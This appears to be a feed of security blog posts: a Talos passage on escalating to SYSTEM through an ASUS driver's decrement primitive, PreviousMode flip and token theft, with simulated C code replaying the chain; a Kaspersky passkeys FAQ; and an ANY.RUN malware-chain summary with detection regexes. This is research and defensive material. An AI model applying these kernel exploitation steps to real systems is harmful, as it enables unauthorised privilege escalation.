The MSR index is checked against the list of allowed indexes in the “MSR_allowedList” array. Unfortunately, this list does not contain the crucial registers mentioned earlier, “IA32_LSTAR (0xC0000082)” and “IA32_SYSENTER_EIP (0x00000176)”. After decoding the allowed indexes to register names and purposes, it turns out we can only manipulate registers without security implications.

Figure 15. Table presenting part of allowed MSR indexes.

With these discoveries, we must look for alternative exploitation methods.

Physical memory mapping

Looking for other code that could be useful during the exploitation process, I found a few IOCTL handlers giving the possibility to map physical memory into the virtual address space of our process. One of them is “0xA040200C”.

Figure 16. Function body responsible for physical memory mapping into caller virtual memory.

We fully control the values of arguments passed to this function: “phyAddress”, “memSize”. At first glance, it seems as though we can map arbitrary physical memory into our user space. We can leverage this primitive in a few different ways, some of which are below:

  • Try to translate the virtual address of important kernel data that we want to modify into a physical address, then use the above code to map it to our user space. Since this address translation cannot be done from User-Mode, we need to use the Kernel-Level API “MmGetPhysicalAddress”.
  • Consistently map successive portions of physical memory and search for structures such as the EPROCESS structure of the SYSTEM process to later replace our process’s security token with the token belonging to the SYSTEM process.
  • Using knowledge about “Low Stub” (PPROCESSOR_START_BLOCK structure), read the value of the CR3 register (PML4 base address) and then, by reading other entries from the memory paging structures, manually translate any virtual address to a physical one.

Russell Sanford’s “Exploiting LOLDrivers” presentation provides more information about these methods, but I had to choose one adequate for the situation.

Unfortunately, I can’t directly translate virtual addresses to physical ones via MmGetPhysicalAddress because there is no way to call this API directly in this driver. Searching through physical memory is very time-consuming and might be problematic (see other examples of implementations and the issues people encountered when choosing this path).

In the end, I chose to implement the “Low Stub” method to manually translate virtual addresses to physical ones. Before doing this, I looked at the function called in line 18, which I named “checkPhyMemoryRange”.

Figure 17. checkPhyMemoryRange body, allowing mapping only certain ranges of physical memory.

The developers defined a set of allowed physical address ranges stored in the “g_goodRanges” variable. If the requested range does not fall within one of these predefined ranges, the function returns true and the handler aborts the mapping with an error code.

The page holding the “Low Stub” (the “PPROCESSOR_START_BLOCK” structure) lies inside an allowed range, so we are able to read it and, in the same way, the CR3 value it holds, which points to the PML4 base address.

However, the next structure in the page-table walk was located outside the allowed physical ranges, so the translation could not proceed. As a result, I abandoned this approach.
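To make the “Low Stub” approach and the reason it failed concrete, here is an added example (my code, not the Talos PoC): a 4-level x86-64 page walk performed purely through physical-memory reads over a constructed, in-memory model of physical RAM. Every read is gated by an allow-list of physical ranges that plays the role of “checkPhyMemoryRange”. The allow-list, the sample virtual address, the backing frame and the table contents are all constructed for the demonstration. The walk also covers 1 GB and 2 MB large pages, which the text does not go into, and it returns a distinct error when a table page lies outside the mappable ranges, which is the dead end described above.

```c
/* Added example, not the Talos PoC: a 4-level x86-64 page walk performed only
 * through "physical memory reads" over a constructed model of physical RAM.
 * Every read passes through an allow-list of physical ranges that models the
 * driver's checkPhyMemoryRange gate. Addresses, ranges and table contents are
 * constructed for the demonstration; the allow-list is hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PHYS_SIZE    (8u << 20)            /* 8 MiB of simulated physical RAM */
#define PTE_P        (1ull << 0)           /* present bit */
#define PTE_PS       (1ull << 7)           /* large page: 1 GiB in PDPTE, 2 MiB in PDE */
#define PFN_MASK     0x000FFFFFFFFFF000ull /* physical address bits of an entry */
#define VA_SAMPLE    0xFFFFF80012345678ull /* constructed kernel VA to translate */
#define FRAME_SAMPLE 0x5000ull             /* constructed 4 KiB frame backing it */

static uint8_t g_phys[PHYS_SIZE];

/* Physical ranges the "driver" is willing to map (hypothetical g_goodRanges). */
typedef struct { uint64_t base, size; } phys_range_t;
static const phys_range_t g_good_ranges[] = {
    { 0x0, 0x20000 }, /* first 128 KiB: room for a Low Stub and a nearby table */
    /* deliberately nothing above 0x20000, where the other tables will sit */
};

/* Models the mapping IOCTL: read len bytes at physical pa, but only when the
 * whole [pa, pa+len) range lies inside one allowed range. */
static int phys_read(uint64_t pa, void *out, size_t len) {
    size_t i;
    for (i = 0; i < sizeof g_good_ranges / sizeof g_good_ranges[0]; i++) {
        uint64_t b = g_good_ranges[i].base, e = b + g_good_ranges[i].size;
        if (pa >= b && pa + len <= e && pa + len <= PHYS_SIZE) {
            memcpy(out, g_phys + pa, len);
            return 0;
        }
    }
    return -1; /* outside g_goodRanges: the handler would return an error here */
}

/* Scenario setup only (no range check): the "OS" writing a table entry. */
static void phys_write64(uint64_t pa, uint64_t v) {
    if (pa + 8 <= PHYS_SIZE) memcpy(g_phys + pa, &v, 8);
}

/* Walk CR3 -> PML4E -> PDPTE -> PDE -> PTE for va. Returns 0 and sets *pa on
 * success, -1 when an entry is not present, -2 when a table page lies outside
 * the mappable ranges (the dead end described in the article). */
int translate_va(uint64_t cr3, uint64_t va, uint64_t *pa) {
    static const int shifts[4] = { 39, 30, 21, 12 };
    uint64_t table = cr3 & PFN_MASK, entry;
    int level;
    for (level = 0; level < 4; level++) {
        uint64_t idx = (va >> shifts[level]) & 0x1FF;
        if (phys_read(table + idx * 8, &entry, 8) != 0) return -2;
        if (!(entry & PTE_P)) return -1;
        if (level == 3) {                               /* 4 KiB page */
            *pa = (entry & PFN_MASK) | (va & 0xFFF);
            return 0;
        }
        if (level >= 1 && (entry & PTE_PS)) {           /* 1 GiB or 2 MiB page */
            uint64_t page_mask = (1ull << shifts[level]) - 1;
            *pa = (entry & PFN_MASK & ~page_mask) | (va & page_mask);
            return 0;
        }
        table = entry & PFN_MASK;                       /* descend to next table */
    }
    return -1;
}

/* Builds PML4/PDPT/PD/PT pages at tables_pa mapping va to target_pa and
 * returns the CR3 value that would point at the PML4. */
uint64_t build_mapping(uint64_t tables_pa, uint64_t va, uint64_t target_pa) {
    uint64_t pml4 = tables_pa, pdpt = tables_pa + 0x1000,
             pd = tables_pa + 0x2000, pt = tables_pa + 0x3000;
    memset(g_phys, 0, sizeof g_phys);
    phys_write64(pml4 + ((va >> 39) & 0x1FF) * 8, pdpt | PTE_P);
    phys_write64(pdpt + ((va >> 30) & 0x1FF) * 8, pd | PTE_P);
    phys_write64(pd   + ((va >> 21) & 0x1FF) * 8, pt | PTE_P);
    phys_write64(pt   + ((va >> 12) & 0x1FF) * 8, target_pa | PTE_P);
    return pml4;
}

/* Demonstration: place the tables at tables_pa and translate VA_SAMPLE.
 * Returns the physical address, or UINT64_MAX on failure; the walk status is
 * stored in *status when status is non-NULL. */
uint64_t demo_translate(uint64_t tables_pa, int *status) {
    uint64_t pa = UINT64_MAX;
    int rc = translate_va(build_mapping(tables_pa, VA_SAMPLE, FRAME_SAMPLE), VA_SAMPLE, &pa);
    if (status) *status = rc;
    return rc == 0 ? pa : UINT64_MAX;
}

int demo_status(uint64_t tables_pa) { int rc; demo_translate(tables_pa, &rc); return rc; }

int main(void) {
    int rc;
    uint64_t pa = demo_translate(0x10000, &rc);  /* tables inside the allowed range */
    printf("tables @0x10000:  rc=%d pa=0x%llx\n", rc, (unsigned long long)pa);
    pa = demo_translate(0x300000, &rc);          /* tables outside: walk refused */
    printf("tables @0x300000: rc=%d pa=0x%llx\n", rc, (unsigned long long)pa);
    return 0;
}
```

With the tables placed at 0x10000 the walk reaches the 4 KiB frame and yields 0x5678; with the same tables at 0x300000 the very first PML4E read falls outside the allow-list and the walk stops with -2, which is exactly why reading CR3 from the Low Stub is not enough when the driver restricts which physical pages it will map.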

Decrement by one to rule them all

Looking for another useful piece of code, I spotted the following “IOCTL 0xa0402450” handler:

Figure 18. IOCTL handler allowing for a call “ObfDereferenceObject” with an arbitrary address controlled by the user.

Users can fully control all three arguments. At first glance, this code might look quite harmless, but when I dove into internals of “ObfDereferenceObject”, I saw the following:  

Figure 19. A small part of the implementation of the “ObfDereferenceObject” API.

Being able to pass an arbitrary address to “ObfDereferenceObject”, I can decrement any memory value by 1. To be precise, “ObfDereferenceObject” decrements the 64-bit PointerCount in the OBJECT_HEADER that precedes every object body, which is why the decrement lands at “Object – 0x30”. I kept this in mind when writing the exploit.

Are there enough puzzles?

But how can we turn these primitives into something useful? Do we need an additional memory leak? When I decided to create a fully working exploit, I assumed a scenario where the code would be executed by a local user (process integrity level: medium). Those familiar with the exploitation process on Windows know that NtQuerySystemInformation can provide very useful information about kernel structures.

However, it’s 2025 and Windows 11 is in use. I remembered news about an upcoming mitigation that would prevent regular users from leaking information such as loaded kernel modules and their addresses via “NtQuerySystemInformation”.

At the beginning of February, when I wrote a fully working exploit, my Windows 11 had not yet received the 24H2 update. It was still “ntoskrnl.exe – 10.0.22621.4890 (WinBuild.160101.0800)”.

After I finished writing this article in March 2025, the 24H2 update finally arrived (“ntoskrnl.exe – 10.0.26100.3476 (WinBuild.160101.0800)”). Leaking kernel addresses with “NtQuerySystemInformation” from a regular, medium-integrity process is no longer possible on that build.

Figure 20. ntoskrnl.exe before the mitigation at the top; the bottom part shows ntoskrnl.exe with the mitigation implemented.

Exploitation

Armed with all the knowledge mentioned above, I began writing the exploit.

Leak own thread KTHREAD structure address

As mentioned in the previous section, on builds without the new mitigation users can utilize the “NtQuerySystemInformation” API to leak, among other things, the address of the “KTHREAD” structure of their own thread. This is where such a simple primitive as “decrement by one” becomes useful.

The “KTHREAD” structure at offset “0x232” has a field called “PreviousMode”, which for User-Mode threads is set to 1. That field is very important and is checked by multiple kernel-level APIs, eventually limiting their functionality if a user calls a particular syscall from User-Mode.

For example, examine what happens when an application calls the “ReadProcessMemory” API, which invokes the “NtReadVirtualMemory” syscall (implemented in “MiReadWriteVirtualMemory”).

Figure 21. Part of NtReadVirtualMemory implementation showing meaning of PreviousMode field.

As we can see at the beginning, the syscall obtains the current thread structure at line 11. Next, in line 13, there is a special condition for the case when PreviousMode is set to 1 (User-Mode). In line 23, there is a check verifying whether the address pointed to by the user (“BaseAddress”), when increased by the requested memory size, exceeds the maximum address where user-mode components are mapped. This ensures that a user making a call from User-Mode cannot read any memory from the Kernel-Mode address space.

Based on this fact, I changed PreviousMode for my own thread by decrementing its value from “1” to “0”, effectively changing its status from User-Mode to Kernel-Mode. This allows me, among other things, to read and write across the entire address space.

To find the address of “KTHREAD” for my own thread, I followed these steps:

Figure 22. Using “NtQuerySystemInformation” to obtain information about all opened handles in the system.

To identify my own thread, I opened a handle to it in line 8 (I later used the handle value to spot the entry related to its structure). Calling “NtQuerySystemInformation” with the “SystemHandleInformation” class, I obtained information about all handles in the system. To spot my own thread handle, I filtered the results by handle value, process ID and object type (thread).

Figure 23. Searching for the structure related to the exploit’s own thread.

Change PreviousMode

Now that I had the “KTHREAD” address and primitive to change the “PreviousMode” field, I combined it together:

Figure 24. Initial part of the exploit code.

I obtained a pointer to the EPROCESS structure simply by using information about its location from KTHREAD. EPROCESS will be discussed in more detail shortly. Remember that “ObfDereferenceObject” subtracts 0x30 from the address passed as an argument, which is why in line 900, 0x30 is added to the PreviousMode address.  

Next, thanks to line 903, we have time to swap the hard link destination and bypass the authorization mechanism before opening a handle to the Asusgio3 device. Inside the “DecrementPreviousMode” function, I simply open a handle to “Asusgio3” and send a properly formatted buffer to trigger the primitive.

Figure 25. Code responsible for sending IRP requests triggering a call to a “ObfDereferenceObject” API with the arbitrary address.

Stealing token

The “PreviousMode” field of the thread has now been changed to “Kernel-Mode”, allowing me to read the entire virtual address space.  With this capability, the first step is to read and store the address location of the EPROCESS structure.

Figure 26. Read the address location of the EPROCESS structure.

Having the address of my own EPROCESS structure, I started to search the linked list of processes for the SYSTEM process (PID == 4). To achieve this, I used a specific field within the EPROCESS structure called “ActiveProcessLinks”, which is a double-linked list of all processes in the system.

Figure 27. Traversing the linked list of processes, looking for the SYSTEM process.

Finding the EPROCESS structure belonging to the SYSTEM process allows me to read its security token and replace the token with the one just read. Remember to increment the reference count of the SYSTEM token!

Figure 28. Swapping the user’s own security token with SYSTEM one.
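The chain from Figure 24 through Figure 28, replayed as an added example that is my code and not the Talos exploit. It runs against a constructed, in-process model of kernel memory: a fake KTHREAD whose “PreviousMode” byte sits at offset 0x232, a modelled “NtReadVirtualMemory” gate that refuses kernel addresses while PreviousMode is 1, a modelled “ObfDereferenceObject” that decrements the 64-bit count 0x30 bytes before the address it is given, and a circular “ActiveProcessLinks” list through three fake EPROCESS structures. Only the 0x232 and 0x30 offsets come from the article; the EPROCESS field layout, the arena and every token value are constructed for the model, and the reference-count bookkeeping on the SYSTEM token that the author warns about is not modelled.

```c
/* Added example, not the Talos exploit: the chain replayed against a constructed,
 * in-process model of kernel memory. Two facts come from the article: KTHREAD's
 * PreviousMode sits at offset 0x232, and ObfDereferenceObject decrements the
 * 64-bit PointerCount located 0x30 bytes before the object body. The EPROCESS
 * layout, the arena and all token values are constructed for the model. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define PREVIOUSMODE_OFFSET 0x232   /* KTHREAD.PreviousMode, from the article */
#define OBJECT_HEADER_SIZE  0x30    /* OBJECT_HEADER precedes every object body */
#define SYSTEM_PID          4
#define SYSTEM_TOKEN_SAMPLE 0xFFFF9D8A11110000ull  /* constructed token value */
#define CONTAINING_RECORD(p, type, field) ((type *)((uint8_t *)(p) - offsetof(type, field)))

typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
typedef struct _FAKE_EPROCESS {     /* stand-in: real offsets differ per build */
    uint64_t   UniqueProcessId;
    LIST_ENTRY ActiveProcessLinks;  /* circular list through all processes */
    uint64_t   Token;
} FAKE_EPROCESS;
typedef struct _FAKE_KTHREAD {      /* stand-in: only PreviousMode's offset is real */
    uint8_t        pad[PREVIOUSMODE_OFFSET];
    uint8_t        PreviousMode;    /* 1 = UserMode, 0 = KernelMode */
    uint8_t        pad2[0x15];
    FAKE_EPROCESS *Process;         /* owning process (assumed offset 0x248) */
} FAKE_KTHREAD;

static uint64_t g_kernel_pool[512]; /* 4 KiB arena standing in for kernel memory */

static int is_kernel_address(const void *p) {
    const uint8_t *a = (const uint8_t *)p, *b = (const uint8_t *)g_kernel_pool;
    return a >= b && a < b + sizeof g_kernel_pool;
}

/* Models the PreviousMode gate in MiReadWriteVirtualMemory: a UserMode caller
 * may not touch kernel addresses, a KernelMode caller may touch anything. */
static int copy_vm(const FAKE_KTHREAD *cur, void *dst, const void *src, size_t n) {
    if (cur->PreviousMode == 1 && (is_kernel_address(src) || is_kernel_address(dst)))
        return -1;                  /* STATUS_ACCESS_VIOLATION in the real kernel */
    memcpy(dst, src, n);
    return 0;
}

/* Models ObfDereferenceObject's side effect: PointerCount-- at Object - 0x30. */
static void fake_ObfDereferenceObject(void *object) {
    uint8_t *hdr = (uint8_t *)object - OBJECT_HEADER_SIZE;
    int64_t count;
    memcpy(&count, hdr, sizeof count);
    count -= 1;
    memcpy(hdr, &count, sizeof count);
}

/* The article's chain: flip PreviousMode, read own EPROCESS, walk
 * ActiveProcessLinks to PID 4, copy its Token over ours. Returns 0 on success. */
int steal_system_token(FAKE_KTHREAD *cur) {
    FAKE_EPROCESS *self, *proc;
    LIST_ENTRY *link;
    uint64_t pid, token;
    uint8_t *pm = (uint8_t *)cur + PREVIOUSMODE_OFFSET;

    if (copy_vm(cur, &self, &cur->Process, sizeof self) == 0) return -1; /* gate must refuse */
    fake_ObfDereferenceObject(pm + OBJECT_HEADER_SIZE);   /* decrement lands on PreviousMode */
    if (cur->PreviousMode != 0) return -2;
    if (copy_vm(cur, &self, &cur->Process, sizeof self) != 0) return -3;
    for (proc = self;;) {
        copy_vm(cur, &pid, &proc->UniqueProcessId, sizeof pid);
        if (pid == SYSTEM_PID) break;
        copy_vm(cur, &link, &proc->ActiveProcessLinks.Flink, sizeof link);
        proc = CONTAINING_RECORD(link, FAKE_EPROCESS, ActiveProcessLinks);
        if (proc == self) return -4;                      /* wrapped around, no PID 4 */
    }
    copy_vm(cur, &token, &proc->Token, sizeof token);
    return copy_vm(cur, &self->Token, &token, sizeof token);
}

/* Builds the arena: SYSTEM, an unrelated process and "our" process in a circular
 * list, plus our KTHREAD still in UserMode. Every value here is constructed. */
FAKE_KTHREAD *build_scenario(void) {
    uint8_t *base = (uint8_t *)g_kernel_pool;
    FAKE_EPROCESS *sys = (FAKE_EPROCESS *)(base + 0x100);
    FAKE_EPROCESS *other = (FAKE_EPROCESS *)(base + 0x200);
    FAKE_EPROCESS *self = (FAKE_EPROCESS *)(base + 0x300);
    FAKE_KTHREAD *thr = (FAKE_KTHREAD *)(base + 0x400);   /* 0x250 bytes, fits in the arena */
    memset(g_kernel_pool, 0, sizeof g_kernel_pool);
    sys->UniqueProcessId = SYSTEM_PID; sys->Token = SYSTEM_TOKEN_SAMPLE;
    other->UniqueProcessId = 1234;     other->Token = 0xFFFF9D8A22220000ull;
    self->UniqueProcessId = 5678;      self->Token = 0xFFFF9D8A33330000ull;
    self->ActiveProcessLinks.Flink = &other->ActiveProcessLinks;  /* self -> other -> sys -> self */
    other->ActiveProcessLinks.Flink = &sys->ActiveProcessLinks;
    sys->ActiveProcessLinks.Flink = &self->ActiveProcessLinks;
    self->ActiveProcessLinks.Blink = &sys->ActiveProcessLinks;
    other->ActiveProcessLinks.Blink = &self->ActiveProcessLinks;
    sys->ActiveProcessLinks.Blink = &other->ActiveProcessLinks;
    thr->PreviousMode = 1;
    thr->Process = self;
    return thr;
}

/* Runs the scenario; returns our process's Token afterwards, 0 if the chain failed. */
uint64_t demo_token_after_exploit(void) {
    FAKE_KTHREAD *thr = build_scenario();
    return steal_system_token(thr) == 0 ? thr->Process->Token : 0;
}
```

Two details are worth noticing. The decrement is applied to a 64-bit value at 0x232, so it only flips PreviousMode cleanly because the byte is 1 and the seven bytes after it are zero in this model; a real exploit must likewise be sure the qword it decrements has no borrow into the neighbouring fields. And the walk over “ActiveProcessLinks” stops when it wraps back to its own EPROCESS, so a missing PID 4 produces an error instead of an infinite loop.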

Run escalated console

Now I can run the escalated console:

Figure 29. Execution of the console, which should be run with escalated privileges to the SYSTEM level.

This reveals the following:

Figure 30. Image showing a fully functional exploit in action and its result.

Success! This exploit results in a console with escalated privileges to SYSTEM level. Watch the video here.

Summary

During the reversal process, I noticed that the developers had patched some previously discovered vulnerabilities and exploitation primitives by restricting certain driver functionalities. However, relying on a disallowed list approach is never a good security practice, as an attacker only needs to find one function that isn’t explicitly blocked to exploit it. Instead, a more effective approach is to implement an allowed list, limiting functionality to only what is necessary.

More importantly, access to a driver with such critical and potentially dangerous functionality should be strictly controlled through multiple layers of security and made available only to a limited number of privileged system users.  

Lastly, this research has demonstrated that attackers can leverage even seemingly simple primitives — such as “decrement by one” — to develop a fully functional privilege escalation exploit. This highlights the importance of careful security design in kernel-mode components.

Cisco Talos Blog – Read More

Kaspersky’s FAQ on using and managing passkeys | Kaspersky official blog

Imagine ditching passwords and SMS verification codes, and instead signing in to apps and websites with a simple fingerprint scan or even a smile at your camera. That’s the promise of passkeys. What’s more, unlike passwords, passkeys are resistant to theft. This means you could read news about data breaches — like the recent one affecting 16 billion accounts — without your heart sinking.

Under various names, this sign-in method is strongly recommended by WhatsApp, Xbox, Microsoft 365, YouTube, and dozens of other popular online services. But what does using passkeys look like in practice? We’ve covered this in detail for Google accounts, and today, we’ll explore how other online services and platforms support passkeys. In this first post, we’ll cover the basics of using passkeys on one or multiple devices. In our next post, we’ll dive into more complex scenarios, such as signing in to your account on a public computer, using Linux, or storing your passkeys on a dongle.

What’s a passkey?

A passkey is a unique digital login key created for a specific website or app. It’s securely stored on your device: your smartphone, computer, or a dedicated USB dongle such as a YubiKey or Google Titan Security Key. When you sign in, your device uses biometrics or a PIN to verify it’s really you. After verification, your device sends a secure response, generated from that unique passkey, to the website. This mechanism offers strong protection against account theft, which is possible with traditional passwords — be that through phishing attacks or website breaches. Passkeys are supported across Apple, Google, and Microsoft devices, and theoretically, with cloud synchronization, they should be accessible across all your devices. For a deeper dive into the internal workings of passkeys, check out our previous article on the subject.

How secure and user-friendly are passkeys?

Before you fully commit to using passkeys, it’s worth considering how convenient they’d be for your specific setup. While the technology is becoming widely adopted, each website and platform implements it differently, using varying terminology for the same features. Additionally, transferring or syncing passkeys can present challenges.

If your smartphone is your only gadget, you are all-in on Apple devices, or you have a couple of recent Android or ChromeOS devices, passkeys will likely save you time when signing in to websites and apps, with minimal hassle.

However, if you use multiple platforms and own many devices, we strongly recommend a third-party password and passkey manager, such as Kaspersky Password Manager, for a smoother experience. Even then, you might still encounter occasional incompatibilities or quirky interfaces on some sites and apps.

For those using less common browsers, Linux-based operating systems, or older computers and smartphones, switching to passkeys might be entirely impracticable, or come with significant limitations.

Keep in mind that very few, if any, services deactivate password-based sign-in when you enable a passkey. This means that, in reality, the enhanced protection against account compromise isn’t as strong as advertised — unless you proactively disable password sign-in yourself. On the flip side, having a password as a backup sign-in method minimizes instances where you might lose access to your account due to passkey issues — but we’ll get into more detail about that later.

Where are passkeys supported in 2025?

Passkeys can be used across major operating systems and browsers, and you don’t necessarily need the absolute latest versions.

  • Windows 11: supported from version 22H2 onward, though also partially usable on Windows 10 with updates.
  • macOS: supported from Ventura onward.
  • iOS/iPadOS: supported from version 16 onward.
  • Android: passkeys are usable from version 9, but crucial additional settings — including integration with external password managers and passkey providers — only became available in version 14.
  • Linux: most major distributions lack native passkey support; however, you can still use the technology by leveraging Chrome, Edge, or Firefox browsers in conjunction with an external password manager or a USB token. We’ll dive deeper into how to use passkeys on Linux in our second post on the topic.
  • Chrome/Edge/Opera: basic passkey capabilities have been around since Chromium version 108, but some conveniences and important features only appeared starting with version 128.
  • Firefox: supported from version 122 onward. Despite the browser support, passkeys often don’t work on many websites specifically with Firefox.
  • Safari: supported from version 16 onward, with certain features only available in version 18 or later.

For you to use a passkey, the website or application you’re signing in to must also support the technology. Hundreds already do, so we’ll just mention some of the major players.

  • Microsoft: passkeys are supported for all personal Microsoft and Xbox accounts. Starting in spring 2025, when creating a new account, the primary option offered is to create a passkey rather than setting a password.
  • iCloud: passkey sign-in is supported for iCloud, but the passkey itself must be stored on an Apple device.
  • Google: passkeys are supported for all personal Google accounts, including YouTube.
  • Meta: supports passkeys for signing in to Facebook and WhatsApp.
  • You can also ditch passwords in favor of passkeys on X/Twitter, LinkedIn, Amazon, PayPal, TikTok, Yahoo, Discord, Adobe Creative Cloud, GitHub, and more.

Popular services that don’t currently support passkeys notably include ChatGPT, Claude, DeepSeek, Reddit, Spotify, Instagram, AliExpress, Temu, and Shein.

What are the downsides of passkeys?

When considering the switch to passkeys and deciding how to store them, there are a few important drawbacks to keep in mind. The first two are unlikely to ever be fully resolved, while others may become less significant over time.

  • Anyone who can unlock your device (by knowing your PIN or looking enough like you to bypass Face ID) can potentially access all your accounts. This is especially critical for shared household computers.
  • If your passkeys are stored on a single device, and that device is damaged or stolen, you could lose access to your accounts. If you haven’t set up alternative sign-in methods, like a password or a backup email or phone number, you’ll have to go through an account recovery process. For some online services, this could take days or even weeks. And if you’ve set up passkey-only sign-in for your primary email, which receives recovery codes for other services, you could potentially lose your accounts forever.
  • Users with multiple devices running various operating systems or using different browsers might encounter difficulties syncing their passkeys. More on this below.
  • If you need to sign in to an account from someone else’s device (like a library or hotel computer), outdated software on that machine might prevent passkey sign-in. So it’s crucial to have a plan B.
  • A less obvious drawback stems from the points above: most online services that offer to switch to passkeys don’t disable other sign-in methods. So, if you protected your account with a weak or reused password before switching to passkeys, attackers could still compromise your account by signing in with the password instead of the passkey.

How to create and use passkeys on a single device?

If you’re rocking just one device that fully supports passkeys (like Apple, Google, or Samsung smartphones released in the last couple of years), making the switch to passkeys is a breeze.

Simply head to the settings of each service you use, find the “Security” section, and look for a “Create a passkey” option.

Here are detailed instructions for Google, Microsoft, Facebook, WhatsApp, TikTok, Discord, Amazon, PayPal, Adobe, Linkedin, and Yahoo.

You won’t find instructions for creating a passkey for your iCloud account here because it happens automatically. Whenever you connect any device running iOS 16 or later, or macOS Ventura or later, to your account, a passkey is created. While you won’t see this in your settings, when you sign in to the iCloud website from an unfamiliar device, you’ll be able to use your passkey instead of a password.

Once created, passkeys are saved locally on your device: on iOS/macOS, they’re in Keychain, and on Android, they can be found in Google Password Manager. Windows is a bit more complex, as passkeys can use either the computer’s built-in storage (accessible via Windows Hello) or other storage options.

Going forward, to sign in to a website or app, just select “Sign in with passkey”, and complete the standard device verification — whether that’s a fingerprint, face scan, or PIN.

The latest versions of Safari on iOS and macOS, as well as Chrome on Windows and macOS (version 136 and later, with Android support “coming soon”), now offer an automatic upgrade option. If your browser has a saved password for a website that now supports passkeys, after you sign in, the browser might automatically create and save a passkey, then prompt you to use it for future passwordless sign-in.

How to use passkeys across multiple devices?

If you’ve got more than one device, you’ll need to figure out how to sync your passkeys across all of them.

If you use only Macs and iPhones, or exclusively Android and ChromeOS devices, you won’t need to go through the hassle of manually setting up passkeys on each gadget. Simply create all your passkeys on one device and ensure that the sync option is enabled in the settings.

For iOS, you can enable this in the iPhone settings under Settings → [your name] → iCloud → Saved to iCloud → Passwords & Keychain → Sync this iPhone (complete guide). On Android, data saved in Google Password Manager automatically syncs with your Google account. Windows and Linux, however, currently lack a built-in passkey sync tool, although Microsoft has said it will develop one soon.

Things get a bit trickier for those who mix and match — especially with popular combinations like Windows + Android or macOS + Android. While you can use passkeys saved on an Android smartphone on your computer, it’s generally limited to Chrome, and only as long as you’re signed in to your Google account in the browser. Given Chrome’s significant drawbacks regarding privacy and user tracking, this solution won’t appeal to everyone. Besides, on a computer, this only allows you to sign in to websites with passkeys; app logins remain exclusive to your Android smartphone.

If you’re an iPhone user with a Windows computer, your iPhone passwords are accessible through the iCloud for Windows app, but it doesn’t support passkeys just yet.

Fortunately, an effective alternative has been available since late 2024. Third-party password managers have gradually added passkey management features across all major platforms. Therefore, the most reliable and universal way to store passkeys, regardless of how many devices you own or what type they are, is to use a robust password manager that supports passkeys and is NOT developed by Apple, Google, or Microsoft. For example, Kaspersky Password Manager already supports passkeys on Windows, with Android support planned for July, and iOS/macOS support for August 2025.

A password manager also solves the backup and recovery problem described above. If your only device with passkeys stored in a third-party password manager is lost or damaged, you can restore your passkeys to a new device from the password manager secure cloud storage.

To use a password manager for passkeys, you’ll need to install it on all your devices and add its browser extension to all browsers on your computer.

How to manage your passkeys?

Managing your saved passkeys is done centrally. If you’re not using a third-party password manager, you can check, delete, or replace outdated passkeys as follows:

  • iOS: for versions through 17, go to Settings → Passwords. Starting with iOS 18, use the dedicated Passwords app.
  • macOS Sequoia and later: use the Passwords app. For earlier versions, find Passwords in System Settings.
  • Android: menu structures vary by manufacturer, but look for a setting like Passwords, passkeys, and accounts, or Password Manager. For Samsung devices, open the Samsung Pass app.
  • Windows: go to settings, then Accounts → Passkeys.
  • If you save your passkeys in Google’s password manager, you can manage them from your computer via google.com.

If you’re using a third-party password manager, all passkey management is handled within that application.

In our next post, we’ll dive into more complex situations when using passkeys, including:

  • How to sign in to your account from a public computer (like at a hotel or library).
  • Whether you can transfer passkeys between iOS and Android.
  • How to store passkeys on hardware security keys (like YubiKey or Google Titan Security Key tokens).
  • Challenges that arise when using passkeys on multilingual international websites.
  • How to protect your account if it also supports password-based sign-in as a backup.

Meanwhile, be sure to subscribe to our Telegram channel to catch the announcement for the next part!

Kaspersky official blog – Read More

Top 3 Cyber Attacks in June 2025: GitHub Abuse, Control Flow Flattening, and More 

June 2025 saw several sophisticated and stealthy cyber attacks that relied heavily on obfuscated scripts, abuse of legitimate services, and multi-stage delivery techniques. Among the key threats observed by ANY.RUN’s analysts were malware campaigns using GitHub for payload hosting, JavaScript employing control-flow flattening to drop Remcos, and obfuscated BAT scripts delivering NetSupport RAT. Let’s see how ANY.RUN’s Interactive Sandbox and Threat Intelligence Lookup can help security teams detect, investigate, and understand these threats. 

1. Braodo Stealer Abuses GitHub for Payload Staging and Hosting 

Original post on X and LinkedIn 

A new campaign distributing Braodo stealer leverages a public GitHub repository, including raw file content, to host payloads. The primary goal of this stealer is data exfiltration, and at the time of analysis, its detection rate was low. The BAT files used in the campaign include misleading comments to complicate analysis.

ANY.RUN’s Script Tracer simplifies the analysis by logging the multi-stage execution flow step by step, without the need for manual deobfuscation. Let’s take a closer look at this threat’s behavior using ANY.RUN Interactive Sandbox, which provides full visibility into process activity and persistence mechanisms.  
 
View analysis 

Braodo stealer detonated in Interactive Sandbox 

The first BAT file executes a CMD command that launches PowerShell in hidden mode to avoid displaying a visible window. It then downloads a second BAT file from github[.]com, disguised as a .PNG file, saves it to the %temp% folder, and executes it.  

Pseudo .png file downloaded from GitHub

The second BAT file launches a new PowerShell script that removes components from the earlier stages, enforces TLS 1.2, retrieves an additional payload from raw.githubusercontent[.]com and saves it in the Startup folder, and downloads the main payload as a ZIP file. This behavior is captured in ANY.RUN’s Script Tracer.

Script Tracer: TLS 1.2 enforced, .zip file downloaded

The final payload, Braodo Stealer, is extracted from a ZIP file, stored in the Public directory, and executed using python.exe. After execution, it deletes the initial archive to reduce artifacts. The Python file is obfuscated with pyobfuscate and contains non-encrypted, custom Base64-encoded payload strings appended to the script. 

The whole attack chain detailed in the Interactive Sandbox 
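The staged chain above (cmd launching hidden PowerShell, a GitHub-hosted .bat disguised as .png dropped to %temp%, TLS 1.2 forced, a Startup-folder drop, and python.exe running from the Public directory) is the kind of sequence a detection engineer would correlate across process-creation telemetry rather than alert on one indicator at a time. The following is an added example, not ANY.RUN code and not a complete rule set: it walks the parent chain of any python.exe started from Public and collects which of the described stages appear among its ancestors. The event fields, regexes and sample command lines (including the placeholder `example/repo` paths) are all constructed for the illustration.

```python
"""Added example: correlate process-creation events into the staged
download chain described above. Not ANY.RUN code; event fields, the
patterns and all sample values are constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# One constructed pattern per stage from the write-up.
STAGES = {
    "hidden_powershell": re.compile(r"powershell.*-w(indowstyle)?\s+hidden", re.I),
    "github_download": re.compile(r"https?://(raw\.githubusercontent\.com|github\.com)/", re.I),
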